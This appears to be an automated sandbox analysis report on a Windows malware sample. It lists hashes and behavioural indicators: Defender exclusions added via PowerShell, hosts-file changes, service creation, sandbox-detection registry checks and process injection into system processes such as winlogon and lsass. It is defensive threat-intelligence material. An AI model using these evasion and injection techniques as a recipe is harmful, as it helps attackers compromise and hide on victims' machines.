Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 12:51
Static task
static1
Behavioral task
behavioral1
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win10v2004-20241007-en
General
-
Target
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
-
Size
15.9MB
-
MD5
d3c16cede9b6e4ee304a0184328d313d
-
SHA1
bd82838a3cc343956ecce4d5051b510dd941de11
-
SHA256
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
-
SHA512
284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b
-
SSDEEP
393216:fwibRRlK6/C+1ZDpHKG1cVWNEtW5I+L11k2OEin:f7RllK+LlaaSW5zL1ypEin
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2152 created 612 2152 powershell.EXE winlogon.exe PID 1724 created 612 1724 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.EXEpid process 3344 powershell.exe 3352 powershell.exe 1724 powershell.EXE 2152 powershell.EXE -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 5044 updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 1840 powercfg.exe 4052 powercfg.exe 4824 powercfg.exe 2940 powercfg.exe 2976 powercfg.exe 2256 powercfg.exe 2856 powercfg.exe 4936 powercfg.exe -
Drops file in System32 directory 15 IoCs
Processes:
OfficeClickToRun.exepowershell.exeupdater.exesvchost.exesvchost.exepowershell.EXEe4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\MRT.exe e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEupdater.exepowershell.EXEdescription pid process target process PID 4612 set thread context of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2152 set thread context of 1992 2152 powershell.EXE dllhost.exe PID 5044 set thread context of 1936 5044 updater.exe dialer.exe PID 5044 set thread context of 2284 5044 updater.exe dialer.exe PID 5044 set thread context of 692 5044 updater.exe dialer.exe PID 1724 set thread context of 5040 1724 powershell.EXE dllhost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1592 sc.exe 796 sc.exe 4944 sc.exe 2748 sc.exe 2896 sc.exe 4428 sc.exe 2264 sc.exe 740 sc.exe 4796 sc.exe 1132 sc.exe 1184 sc.exe 4032 sc.exe 1692 sc.exe 3372 sc.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedialer.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs dialer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={190ECAB3-FDB0-48D9-90A2-083C27695B48}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 21 Nov 2024 12:53:42 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732193620" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.exepowershell.EXEupdater.exepowershell.exedllhost.exepid process 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 3344 powershell.exe 3344 powershell.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2152 powershell.EXE 2152 powershell.EXE 5044 updater.exe 5044 updater.exe 5044 updater.exe 3352 powershell.exe 2152 powershell.EXE 1992 dllhost.exe 1992 dllhost.exe 3352 powershell.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 3352 powershell.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 3352 powershell.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 3352 powershell.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 3352 powershell.exe 1992 dllhost.exe 1992 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exedllhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedialer.exepowershell.EXEsvchost.exedescription pid process Token: SeDebugPrivilege 3344 powershell.exe Token: SeShutdownPrivilege 1840 powercfg.exe Token: SeCreatePagefilePrivilege 1840 powercfg.exe Token: SeShutdownPrivilege 4936 powercfg.exe Token: SeCreatePagefilePrivilege 4936 powercfg.exe Token: SeShutdownPrivilege 4052 powercfg.exe Token: SeCreatePagefilePrivilege 4052 powercfg.exe Token: SeShutdownPrivilege 4824 powercfg.exe Token: SeCreatePagefilePrivilege 4824 powercfg.exe Token: SeDebugPrivilege 2152 powershell.EXE Token: SeDebugPrivilege 2152 powershell.EXE Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 1992 dllhost.exe Token: SeShutdownPrivilege 2940 powercfg.exe Token: SeCreatePagefilePrivilege 2940 powercfg.exe Token: SeShutdownPrivilege 2256 powercfg.exe Token: SeCreatePagefilePrivilege 2256 powercfg.exe Token: SeShutdownPrivilege 2976 powercfg.exe Token: SeCreatePagefilePrivilege 2976 powercfg.exe Token: SeShutdownPrivilege 2856 powercfg.exe Token: SeCreatePagefilePrivilege 2856 powercfg.exe Token: SeLockMemoryPrivilege 692 dialer.exe Token: SeDebugPrivilege 1724 powershell.EXE Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe Token: SeTakeOwnershipPrivilege 2212 svchost.exe Token: SeLoadDriverPrivilege 2212 svchost.exe Token: SeSystemtimePrivilege 2212 svchost.exe Token: SeBackupPrivilege 2212 svchost.exe Token: SeRestorePrivilege 2212 svchost.exe Token: SeShutdownPrivilege 2212 svchost.exe Token: SeSystemEnvironmentPrivilege 2212 svchost.exe Token: SeUndockPrivilege 2212 svchost.exe Token: SeManageVolumePrivilege 2212 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe Token: SeTakeOwnershipPrivilege 2212 svchost.exe Token: SeLoadDriverPrivilege 2212 svchost.exe Token: SeSystemtimePrivilege 2212 svchost.exe Token: SeBackupPrivilege 2212 svchost.exe Token: SeRestorePrivilege 2212 svchost.exe Token: SeShutdownPrivilege 2212 svchost.exe Token: SeSystemEnvironmentPrivilege 2212 svchost.exe Token: SeUndockPrivilege 2212 svchost.exe Token: SeManageVolumePrivilege 2212 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe Token: SeTakeOwnershipPrivilege 2212 svchost.exe Token: SeLoadDriverPrivilege 2212 svchost.exe Token: SeSystemtimePrivilege 2212 svchost.exe Token: SeBackupPrivilege 2212 svchost.exe Token: SeRestorePrivilege 2212 svchost.exe Token: SeShutdownPrivilege 2212 svchost.exe Token: SeSystemEnvironmentPrivilege 2212 svchost.exe Token: SeUndockPrivilege 2212 svchost.exe Token: SeManageVolumePrivilege 2212 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2212 svchost.exe Token: SeIncreaseQuotaPrivilege 2212 svchost.exe Token: SeSecurityPrivilege 2212 svchost.exe Token: SeTakeOwnershipPrivilege 2212 svchost.exe Token: SeLoadDriverPrivilege 2212 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exee4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEdllhost.exedescription pid process target process PID 3044 wrote to memory of 4884 3044 cmd.exe wusa.exe PID 3044 wrote to memory of 4884 3044 cmd.exe wusa.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 4612 wrote to memory of 3860 4612 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 2152 wrote to memory of 1992 2152 powershell.EXE dllhost.exe PID 1992 wrote to memory of 612 1992 dllhost.exe winlogon.exe PID 1992 wrote to memory of 672 1992 dllhost.exe lsass.exe PID 1992 wrote to memory of 936 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1016 1992 dllhost.exe dwm.exe PID 1992 wrote to memory of 436 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 696 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1080 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1104 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1120 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1152 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1268 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1292 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1340 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1376 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1436 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1568 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1584 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1624 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1704 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1736 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1760 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1824 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1876 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 1888 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2004 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 884 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2056 1992 dllhost.exe spoolsv.exe PID 1992 wrote to memory of 2176 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2212 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2224 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2348 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2360 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2488 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2568 1992 dllhost.exe svchost.exe PID 1992 wrote to 